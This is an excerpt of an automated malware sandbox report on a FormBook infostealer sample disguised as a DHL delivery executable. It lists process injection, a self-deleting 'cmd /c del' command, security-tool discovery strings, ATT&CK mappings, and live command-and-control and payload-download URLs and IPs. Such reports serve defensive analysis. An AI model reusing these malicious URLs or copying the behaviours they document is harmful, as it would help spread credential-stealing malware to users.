    Source: C:\Users\user\Desktop\DHL-Delivery.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1350000
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Process created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: explorer.exe, 00000007.00000000.2085348141.0000000001991000.00000002.00000001.sdmp Binary or memory string: Program Managere
    Source: explorer.exe, 00000007.00000002.2730166567.0000000005E30000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000002.3599730539.00000000034F1000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3601733109.0000000000C81000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: Progman`XU
    Source: explorer.exe, 00000007.00000000.2085348141.0000000001991000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.3599730539.00000000034F1000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3601733109.0000000000C81000.00000002.00000001.sdmp Binary or memory string: Progman
    Source: explorer.exe, 00000007.00000000.2085348141.0000000001991000.00000002.00000001.sdmp Binary or memory string: Progmanlock
    Source: cmmon32.exe, 0000000A.00000002.3599730539.00000000034F1000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3601733109.0000000000C81000.00000002.00000001.sdmp Binary or memory string: Program ManagerName
    Source: explorer.exe, 00000007.00000000.2083995735.00000000013DF000.00000004.00000020.sdmp Binary or memory string: Progman1
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A6475 cpuid 0_2_021A6475
    Source: C:\Windows\System32\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B4.tmp.dmp VolumeInformation
    Source: C:\Windows\System32\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FC9.tmp.WERInternalMetadata.xml VolumeInformation
    Source: C:\Windows\System32\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2095.tmp.xml VolumeInformation
    Source: C:\Windows\System32\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp VolumeInformation
    Source: C:\Windows\System32\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_70877588966c9e9114ebf3f0598991a0ff84_15123ce1_166a2352\Report.wer VolumeInformation
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132543128314520433.txt VolumeInformation
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\360\360safe\360Safe.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AVG\Av\avgui.exe
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: Autoruns.exe
    Source: SearchUI.exe, 00000019.00000003.2902596487.000001E6A0208000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Spybot - Search & Destroy\SpybotSD.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERAntiSpyware\SUPERAntiSpyware.exe
    Source: explorer.exe, 00000012.00000003.2837870121.00000000057B5000.00000004.00000001.sdmp Binary or memory string: \\192.168.0.2\all\procexp.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Malwarebytes Anti-Malware\mbam.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Unlocker\Unlocker.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Wireshark\Wireshark.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\AntiVir Desktop\avcenter.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\Antivirus\avcenter.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AVG\AVG2015\avgui.exe
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: 9c:\users\user\downloads\sysinternalssuite\autoruns.exe

    Stealing of Sensitive Information:

    Yara detected FormBook
    Source: Yara match File source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY
    Yara detected Generic Dropper
    Source: Yara match File source: Process Memory Space: DHL-Delivery.exe PID: 892, type: MEMORY
    Source: Yara match File source: Process Memory Space: cmmon32.exe PID: 6544, type: MEMORY
    Source: SearchUI.exe, 00000019.00000003.2903001728.000001E69FBDF000.00000004.00000001.sdmp Binary or memory string: 3373usingapp.TubeTubeforWin_89x4y45kz1d4g!App
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmp Binary or memory string: 3373usingapp.TubeTubeforWin_89x4y45kz1d4g!App12444
    Source: SearchUI.exe, 00000019.00000003.2903001728.000001E69FBDF000.00000004.00000001.sdmp Binary or memory string: Microsoft.Tentacles_8wekyb3d8bbwe!AppAudialsAG.AudialsRadio_3eby6px24ctcy!App0EB8BD08.RuletheKingdom_erk4rrwmt7jyt!App1247042721BubbleKartel.Dubcrush_f7de3ptpzj46y!AppDellPrinter.DellDocumentHub_nmdn7k89bxsn6!App25170robotapps.SocialAppWorld_6gw3az90y6str!App3373usingapp.TubeTubeforWin_89x4y45kz1d4g!AppCapsuleDigital.PhotoFunia_yede6ekgzbztc!App

    Remote Access Functionality:

    Yara detected FormBook
    Source: Yara match File source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Shared Modules 1 | DLL Side-Loading 1 | Process Injection 512 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 23 | LSASS Memory | Security Software Discovery 731 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Virtualization/Sandbox Evasion 23 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 321 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

    Behavior Graph

    [Behavior graph image not reproduced. Behavior Graph ID: 121908, Sample: DHL-Delivery.exe, Start date: 05/01/2021, Architecture: WINDOWS, Score: 100]


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    DHL-Delivery.exe | 34% | Virustotal |
    DHL-Delivery.exe | 17% | Metadefender |
    DHL-Delivery.exe | 41% | ReversingLabs | Win32.Downloader.Minix

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    Source | Detection | Scanner | Label
    officialilluminati.net | 0% | Virustotal |
    procesotg.com | 6% | Virustotal |

    URLs

    http://www.849nmaym.info/mph/0%Avira URL Cloudsafe
    http://www.koottukudumbam.comReferer:0%Avira URL Cloudsafe
    http://www.maxmaldives.com/mph/0%Avira URL Cloudsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.olenfex.com/mph/www.bikeemperor.com0%Avira URL Cloudsafe
    http://www.groupoperationltd.com/mph/0%Avira URL Cloudsafe
    http://www.maxmaldives.com0%Avira URL Cloudsafe
    http://www.evolutionhvac.net/mph/0%Avira URL Cloudsafe
    http://www.biostaticwall.com/mph/0%Avira URL Cloudsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.koottukudumbam.com0%Avira URL Cloudsafe
    https://mths.be/fromcodepoint0%Avira URL Cloudsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.gorgereport.com/mph/0%Avira URL Cloudsafe
    http://www.mcfarlandfamilyevents.com0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    evolutionhvac.net | 34.102.136.180 | true | true | | unknown
    officialilluminati.net | 198.54.126.238 | true | true | | unknown
    procesotg.com | 162.144.5.131 | true | true | | unknown
    www.amonez.com | unknown | unknown | true | | unknown
    www.evolutionhvac.net | unknown | unknown | true | | unknown
    www.yuneimit.com | unknown | unknown | true | | unknown
    www.officialilluminati.net | unknown | unknown | true | | unknown

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              http://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0 | true | Avira URL Cloud: safe | unknown
              http://www.evolutionhvac.net/mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd0 | true | Avira URL Cloud: safe | unknown
              http://procesotg.com/bin_dIyfkt31.bin | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries


                      Contacted IPs


                      Public

                      IP | Domain | Country | ASN | ASN Name | Malicious
                      34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
                      198.54.126.238 | unknown | United States | 22612 | NAMECHEAP-NETUS | true
                      162.144.5.131 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true

                      Private

                      IP
                      192.168.0.2

                      General Information

                      Joe Sandbox Version: 31.0.0 Red Diamond
                      Analysis ID: 121908
                      Start date: 05.01.2021
                      Start time: 10:26:41
                      Joe Sandbox Product: Cloud
                      Overall analysis duration: 0h 16m 37s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Sample file name: DHL-Delivery.exe
                      Cookbook file name: default.jbs
                      Analysis system description: W10 x64 1809 Native physical Machine for testing VM-aware malware (Office 2016, Internet Explorer 11, Java 8u231, Adobe Reader DC 19)
                      Number of analysed new started processes analysed: 37
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Detection: MAL
                      Classification: mal100.rans.troj.spyw.evad.winEXE@10/137@6/4
                      EGA Information:
                      • Successful, ratio: 83.3%
                      HDC Information:
                      • Successful, ratio: 6.6% (good quality ratio 6%)
                      • Quality average: 66.8%
                      • Quality standard deviation: 27.8%
                      HCA Information:
                      • Successful, ratio: 91%
                      • Number of executed functions: 251
                      • Number of non-executed functions: 63
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, wermgr.exe, backgroundTaskHost.exe, MusNotificationUx.exe, UsoClient.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, mobsync.exe
                      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 205.185.216.10, 205.185.216.42, 51.103.5.159, 168.61.161.212, 204.79.197.200, 13.107.21.200, 51.104.139.180
                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, arc.msn.com.nsatc.net, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, cds.d2s7q6s2.hwcdn.net, wns.notify.windows.com.akadns.net, arc.msn.com, par02p.wns.notify.windows.com.akadns.net, a-0001.a-afdentry.net.trafficmanager.net, emea1.notify.windows.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                      • Execution Graph export aborted for target SearchUI.exe, PID 6804 because there are no executed function
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.


                      Simulations

                      Behavior and APIs

                      Time | Type | Description
                      10:33:44 | API Interceptor | 571x Sleep call for process: explorer.exe modified

                      Joe Sandbox View / Context

                      IPs


                      Domains

                      No context

                      ASN


                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_70877588966c9e9114ebf3f0598991a0ff84_15123ce1_166a2352\Report.wer
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):32720
                      Entropy (8bit):3.6782015835373576
                      Encrypted:false
                      SSDEEP:384:qNjAhz9wb0F6Trj3KXxooRaOX7VE/OXu7Fqh4ltna:qNQz9wwF6Trj3Cx7aOX7V1Xu7Fqh4lta
                      MD5:0823B3F93983C0458D4F2E43F91546E3
                      SHA1:602F36D7727C30C2D525ECB5DFC8C6F364FB16B3
                      SHA-256:BB5845148AA087B32579077ABE1D68EB366047A1BF67C84D15912289B2C2304D
                      SHA-512:4B42D7C396CC79A1B33D0E2E9CED1EDD92E5C05593D2A6C4578EA5741ADDD84953AB8B08B24E9A17C7EF640D26D41F4F204F91C5654445887270B6445990A8C3
                      Malicious:false
                      Reputation:low
                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FC9.tmp.WERInternalMetadata.xml
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):10848
                      Entropy (8bit):3.7029922346526734
                      Encrypted:false
                      SSDEEP:192:R3l7DfNifsZl6YK/5Bfgmfq4Z79QYpDRJ89bbcVPXqBfnixpm:R3l3NiUZl6YaPfgmfq4Z79ZmbmPXqBfz
                      MD5:451059AC5DB46DF5A697AF0E4F2AE1BE
                      SHA1:0A6E4AA0A90BF8486BF2DD419FE5A281A5527F1F
                      SHA-256:ECB3287D7FC89862700D848EEB9C438D1BAE3D465002B3686877E2F037E2EC9C
                      SHA-512:2A0B6AF986FC62436AA3CFC2C00823B9AB18DCF11A9F0B8EA1F0F270C675A11157E476FAFDFD7E050E4C9BECE8F72551643A1AEA4ADD3D27FA1A35F7D7BFDE88
                      Malicious:false
                      Reputation:low
                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2095.tmp.xml
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4763
                      Entropy (8bit):4.528305605662854
                      Encrypted:false
                      SSDEEP:48:cvIwGE8zsi/mDI94IMWv81w9uRt4RPm8M4JXYQOFZUyq85tQ8yw91wMA+d:uIsfilEkuuJIQOUmQbwAMA+d
                      MD5:580F321FFC0D9A5CF971930F0D693B98
                      SHA1:1177257C092682BA4E176CCC4DA086D11B21BF5F
                      SHA-256:C81EF1BCDD9EBE7A297AB38C11318FABCB56CE46BA7F4C893ED23F9935999785
                      SHA-512:F2D806C7E2E960572EE875BE6D9DF66E57949D9E0C9B2F27429AFA9D2FB8F14FF32C9FA25B3384483C792906211871594B080E1319B35CD129A7222C11D222A4
                      Malicious:false
                      Reputation:low
                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B4.tmp.dmp
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Tue Jan 5 09:33:40 2021, 0x1205a4 type
                      Category:dropped
                      Size (bytes):737704
                      Entropy (8bit):1.364695721839178
                      Encrypted:false
                      SSDEEP:1536:fxwushh96VaWG2TsMqJlG2sIobcqNyKMIvvtvdt4N0:fxKhhKTM1sBgMMAltj
                      MD5:3D4BF86079B5ADD1F5F9A088100D5A69
                      SHA1:BCC14FC0CD359D030B6D0CA032A72654BF966721
                      SHA-256:BF5CA3D03D3DFCA142D75FC7E66A0E0A168003FEDAB729172F45E781F973999E
                      SHA-512:05A6DCF119749EEB5D11169090276BBD69B20C901DBEF40D3360D8F032F299FA280C924EA7CEC01F3613E48F5A0A3E2749C4062D56484BEDC33004DF4EB206BB
                      Malicious:false
                      Reputation:low
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\1DLLHrh5gD2BxyZsLN2_FxFV-Gc.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines
                      Category:dropped
                      Size (bytes):121602
                      Entropy (8bit):5.370178867506393
                      Encrypted:false
                      SSDEEP:3072:wKXX4GkTzrQcDhJYoGWvDRBaLr9FlKFV8fUkFUkZ86E:wKuLvEFOiz8j
                      MD5:D31109A1A8607913AB74DF4745E41B60
                      SHA1:DECEDCF25FDCD96AFBFBCC08924E29C0C5C12F78
                      SHA-256:6390CC8F2AF2FC748F4EEE4927C2D68B0271938F2AF31B6D039C575B044E7D6D
                      SHA-512:0C0911B5106A13BD0A1DAF173F1CE9E319522A75C104D7EFF73BCC14BA281ECB742502A047836A232E368828C9ECE0E67E7DA944F3C14268F12513003B2954AC
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\9Ht61b9IFYipu38R0kp97M9KSo8.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):46010
                      Entropy (8bit):5.543964838040099
                      Encrypted:false
                      SSDEEP:768:eaCiT8vz9VV4xhSXkyrqRxu/DuMYdt71Nr9p1NXoT/V:APz9n4xhSXkyrq/cDuMYd7NXc
                      MD5:9108372127C60AD398F4E22BD33E3A56
                      SHA1:FC83C8AF5B20C2708A8B3A3527D9982394B70291
                      SHA-256:CBA915C9608AA434CCC6D7974DF26C65C72C4C0AB2AD980D17898D7CCECDD576
                      SHA-512:1F55A2D47956305AB7B0B29A77A8C8D8A072EDD5AAAAC7B975CD3AB67B93ECF8E5C0F0B1F2E55FCB3C993845590077984640C78D83D3D8F39F2B9713F75DF897
                      Malicious:false
                      Reputation:low
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\AjtDo5CuCwKn9Z68f3Ya5AF5dIM[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):77082
                      Entropy (8bit):5.207037605863821
                      Encrypted:false
                      SSDEEP:384:B7Nyr2SeGdDzVOwFsOB1ZgM53klAq00EWvsECx0enIh1r7UHcPhQ5nNCKq8YEc6U:B7Ny5fdDzVzOOWuxPqenQ8HcP8YErU
                      MD5:AD12D7C406E186693A63B33914AF8D24
                      SHA1:8BAF278FA18C56ABB58F1157F62C2426B74A974A
                      SHA-256:2502BCF391A30EAE74D4C14C9BBAD818474B066F58D88EB894E3C537A037B3D0
                      SHA-512:A2337F81DF82481B6D57355A7973B266996E92840967CB063096D94B36EBA87B7380C833E8EE8F9C71FD20C2230870002A91C06E49E5D667219BAFCC59A031E2
                      Malicious:false
                      Reputation:low
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\BBDBvk5AokRBwrox4FNOb3dTd1E[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):7671
                      Entropy (8bit):5.15245035345059
                      Encrypted:false
                      SSDEEP:192:UADGOuMWZEWjhd7FeyLCL6p7tkJ/srOk3aG3ek1EWTnl/kv9:UuJGcMJfLO
                      MD5:A1F32F25C7C924B918EA54A86670D731
                      SHA1:F1BF7CB5ADDF0C4BCED58D661137A1F0ACD257C5
                      SHA-256:6B58339F9240E372FA046E985DA0D0C5A17B679F27FF3058D6EBD4CD515CA874
                      SHA-512:5ACEFCAB3062051BD538CCF57EBCBB0BC9FCF11C12768EC7559B2ADA84F871299CE2C93B2400807F362578AD2C0F31AFF5CFE925C2FB259A7FFD24CC498435ED
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\BQR--Mi6Hdug9aUgfjMzORag63E.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):15771
                      Entropy (8bit):5.09526529579509
                      Encrypted:false
                      SSDEEP:192:J/MS4lVzgNo0Hb0FAuV++JmzlqZ6GLIV87GI9BgJSY6+lzmu2Bp2aQbwyPcvsyDQ:V4mo07kV7JZ6GLIK7GfVp2Hpykvswb8
                      MD5:E515E69B21C49A355D5D4B91764ABE00
                      SHA1:7571F85095E21BA061631D8A38D18623BCABF301
                      SHA-256:365F8B7A23865CA36D1C1F7A25553AFDDB6223FF524B56D4BEB80FDD98C8E057
                      SHA-512:AA38791CE4ED4039A6D63CF6273BE8CA0DDE2436B8C6E0451937A85652D1C6EA22F38DA9FD81BA9A4E877861B507603C88CACBBFFE4E6B30EC602396F2B87A81
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Dae9F3uWr1j96ciQZxvUiMLiQ20[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):6584
                      Entropy (8bit):5.431678053520003
                      Encrypted:false
                      SSDEEP:192:wESNgDI0VOD4uejPhA/c5jlTULbhCtE+h:fnb9ThtEe
                      MD5:BD7AE7C3176D8081B60F1107A59E2E0A
                      SHA1:0DA7BD177B96AF58FDE9C890671BD488C2E2436D
                      SHA-256:69A4F680A4A443E28D84769ABBBCDC1A64F24117E2B477B49DF0E6CFD5A83FCC
                      SHA-512:0145288AB1C74C45790C7ABCA7B0AA6A0E8C09AB05FC5B9A0AB858BE1B6E302F043EE5DA81C57158BE48A1700D63E9567C8D5DD56ED021508622F81A1D99D168
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\DuMT0g46t3Uc7KlS-OCMEDPoXyg[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):1629921
                      Entropy (8bit):6.269910493841166
                      Encrypted:false
                      SSDEEP:24576:8PEw1lQTjvUe7u9D6+zZpP+vkn8OgVsJbTDXFW:iEwLQTjvUe7u9DTzH+vk4gbTDXFW
                      MD5:4800D0FDD008BCE6FB94B4C6CE63EAEB
                      SHA1:8CC560FB1ACC60B82A9075DE8D20B8291881521E
                      SHA-256:CC1B212DAA5BE4CFC7CA7BA3FF59F67919AA7C921CE406A5A2D42BCA97B3EA40
